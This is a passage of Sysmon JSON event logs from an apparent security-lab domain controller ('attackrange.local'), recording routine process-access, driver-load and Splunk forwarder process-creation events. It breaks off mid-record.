{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.958\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.958","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.005\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.005","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.005\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.005","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.005\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.005","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1634,"ProcessID":2928,"ThreadID":3412,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:54.241\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xennet.sys\r\nHashes: MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 06:48:54.241","ImageLoaded":"C:\\Windows\\System32\\drivers\\xennet.sys","Hashes":"MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.219\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nProcessId: 3744\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.219","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.210\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 2664\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.210","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"2664","SourceImage":"C:\\Program 